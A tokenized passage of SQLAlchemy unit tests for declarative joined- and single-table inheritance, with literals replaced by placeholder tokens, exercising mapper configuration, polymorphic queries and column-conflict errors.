'<STR_LIT:bar>' <EOL> bar_id = Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> foo_id = Column ( '<STR_LIT>' , Integer ) <EOL> __mapper_args__ = { '<STR_LIT>' : foo_id == Foo . id } <EOL> configure_mappers ( ) <EOL> def test_joined ( self ) : <EOL> class Company ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> employees = relationship ( '<STR_LIT>' ) <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> company_id = Column ( '<STR_LIT>' , Integer , <EOL> ForeignKey ( '<STR_LIT>' ) ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> primary_language = Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> class Manager ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> golf_swing = Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> c1 = Company ( <EOL> name = '<STR_LIT>' , <EOL> employees = [ <EOL> Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) , <EOL> Manager ( name = '<STR_LIT>' , golf_swing = '<STR_LIT>' ) ] ) <EOL> c2 = Company ( name = '<STR_LIT>' , <EOL> employees = [ Engineer ( name = '<STR_LIT>' , <EOL> primary_language = '<STR_LIT>' ) ] ) <EOL> sess . add ( c1 ) <EOL> sess . add ( c2 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Company ) . filter ( Company . employees . of_type ( Engineer ) . <EOL> any ( Engineer . primary_language <EOL> == '<STR_LIT>' ) ) . first ( ) , c2 ) <EOL> eq_ ( <EOL> Manager . id . property . columns , <EOL> [ Manager . __table__ . c . id , Person . __table__ . c . id ] <EOL> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> assert sess . query ( Manager ) . filter ( Manager . name == '<STR_LIT>' <EOL> ) . one ( ) . id <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> assert sess . query ( Person ) . filter ( Manager . name == '<STR_LIT>' <EOL> ) . one ( ) . id <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_add_subcol_after_the_fact ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> Engineer . primary_language = Column ( '<STR_LIT>' , <EOL> String ( <NUM_LIT:50> ) ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> e1 = Engineer ( primary_language = '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> sess . add ( e1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . first ( ) , <EOL> Engineer ( primary_language = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> def test_add_parentcol_after_the_fact ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> Person . name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> e1 = Engineer ( primary_language = '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> sess . add ( e1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . first ( ) , <EOL> Engineer ( primary_language = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> def test_add_sub_parentcol_after_the_fact ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> class Admin ( Engineer ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> workstation = Column ( String ( <NUM_LIT:50> ) ) <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> Person . name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> e1 = Admin ( primary_language = '<STR_LIT>' , name = '<STR_LIT>' , <EOL> workstation = '<STR_LIT:foo>' ) <EOL> sess . add ( e1 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . first ( ) , <EOL> Admin ( primary_language = '<STR_LIT>' , name = '<STR_LIT>' , workstation = '<STR_LIT:foo>' ) ) <EOL> def test_subclass_mixin ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class MyMixin ( object ) : <EOL> pass <EOL> class Engineer ( MyMixin , Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> primary_language = Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> assert class_mapper ( Engineer ) . inherits is class_mapper ( Person ) <EOL> def test_with_undefined_foreignkey ( self ) : <EOL> class Parent ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> tp = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = dict ( polymorphic_on = tp ) <EOL> class Child1 ( Parent ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> related_child2 = Column ( '<STR_LIT>' , Integer , <EOL> ForeignKey ( '<STR_LIT>' ) ) <EOL> __mapper_args__ = dict ( polymorphic_identity = '<STR_LIT>' ) <EOL> class Child2 ( Parent ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> related_child1 = Column ( '<STR_LIT>' , Integer ) <EOL> __mapper_args__ = dict ( polymorphic_identity = '<STR_LIT>' ) <EOL> sa . orm . configure_mappers ( ) <EOL> def test_foreign_keys_with_col ( self ) : <EOL> """<STR_LIT>""" <EOL> class Booking ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> class PlanBooking ( Booking ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( Booking . id ) , <EOL> primary_key = True ) <EOL> class FeatureBooking ( Booking ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , ForeignKey ( Booking . id ) , <EOL> primary_key = True ) <EOL> plan_booking_id = Column ( Integer , <EOL> ForeignKey ( PlanBooking . id ) ) <EOL> plan_booking = relationship ( PlanBooking , <EOL> backref = '<STR_LIT>' ) <EOL> assert FeatureBooking . __table__ . c . plan_booking_id . references ( PlanBooking . __table__ . c . id ) <EOL> assert FeatureBooking . __table__ . c . id . references ( Booking . __table__ . c . id ) <EOL> def test_single_colsonbase ( self ) : <EOL> """<STR_LIT>""" <EOL> class Company ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> employees = relationship ( '<STR_LIT>' ) <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> company_id = Column ( '<STR_LIT>' , Integer , <EOL> ForeignKey ( '<STR_LIT>' ) ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> primary_language = Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> golf_swing = Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> class Manager ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> c1 = Company ( <EOL> name = '<STR_LIT>' , <EOL> employees = [ <EOL> Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) , <EOL> Manager ( name = '<STR_LIT>' , golf_swing = '<STR_LIT>' ) ] ) <EOL> c2 = Company ( name = '<STR_LIT>' , <EOL> employees = [ Engineer ( name = '<STR_LIT>' , <EOL> primary_language = '<STR_LIT>' ) ] ) <EOL> sess . add ( c1 ) <EOL> sess . add ( c2 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . filter ( Engineer . primary_language <EOL> == '<STR_LIT>' ) . first ( ) , <EOL> Engineer ( name = '<STR_LIT>' ) ) <EOL> eq_ ( sess . query ( Company ) . filter ( Company . employees . of_type ( Engineer ) . <EOL> any ( Engineer . primary_language <EOL> == '<STR_LIT>' ) ) . first ( ) , c2 ) <EOL> def test_single_colsonsub ( self ) : <EOL> """<STR_LIT>""" <EOL> class Company ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> employees = relationship ( '<STR_LIT>' ) <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> company_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Manager ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert Person . __table__ . c . company_id is not None <EOL> assert Person . __table__ . c . golf_swing is not None <EOL> assert Person . __table__ . c . primary_language is not None <EOL> assert Engineer . primary_language is not None <EOL> assert Manager . golf_swing is not None <EOL> assert not hasattr ( Person , '<STR_LIT>' ) <EOL> assert not hasattr ( Person , '<STR_LIT>' ) <EOL> assert not hasattr ( Engineer , '<STR_LIT>' ) <EOL> assert not hasattr ( Manager , '<STR_LIT>' ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> e1 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> e2 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> m1 = Manager ( name = '<STR_LIT>' , golf_swing = '<STR_LIT>' ) <EOL> c1 = Company ( name = '<STR_LIT>' , employees = [ e1 , e2 , m1 ] ) <EOL> e3 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> c2 = Company ( name = '<STR_LIT>' , employees = [ e3 ] ) <EOL> sess . add ( c1 ) <EOL> sess . add ( c2 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . filter ( Engineer . primary_language <EOL> == '<STR_LIT>' ) . first ( ) , <EOL> Engineer ( name = '<STR_LIT>' ) ) <EOL> eq_ ( sess . query ( Company ) . filter ( Company . employees . of_type ( Engineer ) . <EOL> any ( Engineer . primary_language <EOL> == '<STR_LIT>' ) ) . first ( ) , c2 ) <EOL> eq_ ( sess . query ( Engineer ) . filter_by ( primary_language = '<STR_LIT>' <EOL> ) . one ( ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) ) <EOL> def test_single_constraint_on_sub ( self ) : <EOL> """<STR_LIT>""" <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> __hack_args_one__ = sa . UniqueConstraint ( <EOL> Person . name , primary_language ) <EOL> __hack_args_two__ = sa . CheckConstraint ( <EOL> Person . name != primary_language ) <EOL> uq = [ c for c in Person . __table__ . constraints <EOL> if isinstance ( c , sa . UniqueConstraint ) ] [ <NUM_LIT:0> ] <EOL> ck = [ c for c in Person . __table__ . constraints <EOL> if isinstance ( c , sa . CheckConstraint ) ] [ <NUM_LIT:0> ] <EOL> eq_ ( <EOL> list ( uq . columns ) , <EOL> [ Person . __table__ . c . name , Person . __table__ . c . primary_language ] <EOL> ) <EOL> eq_ ( <EOL> list ( ck . columns ) , <EOL> [ Person . __table__ . c . name , Person . __table__ . c . primary_language ] <EOL> ) <EOL> @ testing . skip_if ( lambda : testing . against ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" ) <EOL> def test_columns_single_inheritance_conflict_resolution ( self ) : <EOL> """<STR_LIT>""" <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> class Engineer ( Person ) : <EOL> """<STR_LIT>""" <EOL> @ declared_attr <EOL> def target_id ( cls ) : <EOL> return cls . __table__ . c . get ( <EOL> '<STR_LIT>' , <EOL> Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> @ declared_attr <EOL> def target ( cls ) : <EOL> return relationship ( "<STR_LIT>" ) <EOL> class Manager ( Person ) : <EOL> """<STR_LIT>""" <EOL> @ declared_attr <EOL> def target_id ( cls ) : <EOL> return cls . __table__ . c . get ( <EOL> '<STR_LIT>' , <EOL> Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> @ declared_attr <EOL> def target ( cls ) : <EOL> return relationship ( "<STR_LIT>" ) <EOL> class Other ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> is_ ( <EOL> Engineer . target_id . property . columns [ <NUM_LIT:0> ] , <EOL> Person . __table__ . c . target_id <EOL> ) <EOL> is_ ( <EOL> Manager . target_id . property . columns [ <NUM_LIT:0> ] , <EOL> Person . __table__ . c . target_id <EOL> ) <EOL> Base . metadata . create_all ( ) <EOL> session = Session ( ) <EOL> o1 , o2 = Other ( ) , Other ( ) <EOL> session . add_all ( [ <EOL> Engineer ( target = o1 ) , <EOL> Manager ( target = o2 ) , <EOL> Manager ( target = o1 ) <EOL> ] ) <EOL> session . commit ( ) <EOL> eq_ ( session . query ( Engineer ) . first ( ) . target , o1 ) <EOL> def test_joined_from_single ( self ) : <EOL> class Company ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> employees = relationship ( '<STR_LIT>' ) <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> company_id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Manager ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Engineer ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert Person . __table__ . c . golf_swing is not None <EOL> assert '<STR_LIT>' not in Person . __table__ . c <EOL> assert Engineer . __table__ . c . primary_language is not None <EOL> assert Engineer . primary_language is not None <EOL> assert Manager . golf_swing is not None <EOL> assert not hasattr ( Person , '<STR_LIT>' ) <EOL> assert not hasattr ( Person , '<STR_LIT>' ) <EOL> assert not hasattr ( Engineer , '<STR_LIT>' ) <EOL> assert not hasattr ( Manager , '<STR_LIT>' ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> e1 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> e2 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> m1 = Manager ( name = '<STR_LIT>' , golf_swing = '<STR_LIT>' ) <EOL> c1 = Company ( name = '<STR_LIT>' , employees = [ e1 , e2 , m1 ] ) <EOL> e3 = Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) <EOL> c2 = Company ( name = '<STR_LIT>' , employees = [ e3 ] ) <EOL> sess . add ( c1 ) <EOL> sess . add ( c2 ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . with_polymorphic ( Engineer ) . <EOL> filter ( Engineer . primary_language <EOL> == '<STR_LIT>' ) . first ( ) , Engineer ( name = '<STR_LIT>' ) ) <EOL> eq_ ( sess . query ( Company ) . filter ( Company . employees . of_type ( Engineer ) . <EOL> any ( Engineer . primary_language <EOL> == '<STR_LIT>' ) ) . first ( ) , c2 ) <EOL> eq_ ( sess . query ( Engineer ) . filter_by ( primary_language = '<STR_LIT>' <EOL> ) . one ( ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = '<STR_LIT>' ) ) <EOL> def test_single_from_joined_colsonsub ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Manager ( Person ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> id = Column ( Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Boss ( Manager ) : <EOL> boss_name = Column ( String ( <NUM_LIT:50> ) ) <EOL> is_ ( <EOL> Boss . __mapper__ . column_attrs [ '<STR_LIT>' ] . columns [ <NUM_LIT:0> ] , <EOL> Manager . __table__ . c . boss_name <EOL> ) <EOL> def test_polymorphic_on_converted_from_inst ( self ) : <EOL> class A ( Base ) : <EOL> __tablename__ = '<STR_LIT:A>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> discriminator = Column ( String ) <EOL> @ declared_attr <EOL> def __mapper_args__ ( cls ) : <EOL> return { <EOL> '<STR_LIT>' : cls . __name__ , <EOL> '<STR_LIT>' : cls . discriminator <EOL> } <EOL> class B ( A ) : <EOL> pass <EOL> is_ ( B . __mapper__ . polymorphic_on , A . __table__ . c . discriminator ) <EOL> def test_add_deferred ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> Person . name = deferred ( Column ( String ( <NUM_LIT:10> ) ) ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> p = Person ( name = '<STR_LIT>' ) <EOL> sess . add ( p ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . all ( ) , [ Person ( name = '<STR_LIT>' ) ] ) <EOL> sess . expunge_all ( ) <EOL> person = sess . query ( Person ) . filter ( Person . name == '<STR_LIT>' <EOL> ) . one ( ) <EOL> assert '<STR_LIT:name>' not in person . __dict__ <EOL> def test_single_fksonsub ( self ) : <EOL> """<STR_LIT>""" <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language_id = Column ( Integer , <EOL> ForeignKey ( '<STR_LIT>' ) ) <EOL> primary_language = relationship ( '<STR_LIT>' ) <EOL> class Language ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True , <EOL> test_needs_autoincrement = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert not hasattr ( Person , '<STR_LIT>' ) <EOL> Base . metadata . create_all ( ) <EOL> sess = create_session ( ) <EOL> java , cpp , cobol = Language ( name = '<STR_LIT>' ) , Language ( name = '<STR_LIT>' ) , Language ( name = '<STR_LIT>' ) <EOL> e1 = Engineer ( name = '<STR_LIT>' , primary_language = java ) <EOL> e2 = Engineer ( name = '<STR_LIT>' , primary_language = cpp ) <EOL> e3 = Engineer ( name = '<STR_LIT>' , primary_language = cobol ) <EOL> sess . add_all ( [ e1 , e2 , e3 ] ) <EOL> sess . flush ( ) <EOL> sess . expunge_all ( ) <EOL> eq_ ( sess . query ( Person ) . filter ( Engineer . primary_language . has ( <EOL> Language . name <EOL> == '<STR_LIT>' ) ) . first ( ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = Language ( name = '<STR_LIT>' ) ) ) <EOL> eq_ ( sess . query ( Engineer ) . filter ( Engineer . primary_language . has ( <EOL> Language . name <EOL> == '<STR_LIT>' ) ) . one ( ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = Language ( name = '<STR_LIT>' ) ) ) <EOL> eq_ ( sess . query ( Person ) . join ( Engineer . primary_language ) . order_by ( <EOL> Language . name ) . all ( ) , <EOL> [ Engineer ( name = '<STR_LIT>' , <EOL> primary_language = Language ( name = '<STR_LIT>' ) ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = Language ( name = '<STR_LIT>' <EOL> ) ) , <EOL> Engineer ( name = '<STR_LIT>' , primary_language = Language ( name = '<STR_LIT>' ) ) ] ) <EOL> def test_single_three_levels ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> class JuniorEngineer ( Engineer ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> nerf_gun = Column ( String ( <NUM_LIT:50> ) ) <EOL> class Manager ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert JuniorEngineer . nerf_gun <EOL> assert JuniorEngineer . primary_language <EOL> assert JuniorEngineer . name <EOL> assert Manager . golf_swing <EOL> assert Engineer . primary_language <EOL> assert not hasattr ( Engineer , '<STR_LIT>' ) <EOL> assert not hasattr ( Engineer , '<STR_LIT>' ) <EOL> assert not hasattr ( Manager , '<STR_LIT>' ) <EOL> assert not hasattr ( Manager , '<STR_LIT>' ) <EOL> def test_single_detects_conflict ( self ) : <EOL> class Person ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( <NUM_LIT:50> ) ) <EOL> __mapper_args__ = { '<STR_LIT>' : discriminator } <EOL> class Engineer ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> def go ( ) : <EOL> class Manager ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> golf_swing = Column ( String ( <NUM_LIT:50> ) ) <EOL> primary_language = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert_raises ( sa . exc . ArgumentError , go ) <EOL> def go ( ) : <EOL> class Salesman ( Person ) : <EOL> __mapper_args__ = { '<STR_LIT>' : '<STR_LIT>' } <EOL> name = Column ( String ( <NUM_LIT:50> ) ) <EOL> assert_raises ( sa . exc . ArgumentError , go ) <EOL> def test_single_no_special_cols ( self ) : <EOL> class Person ( Base , fixtures . ComparableEntity ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> name = Column ( '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) <EOL> discriminator = Column ( '<STR_LIT:type>' , String ( 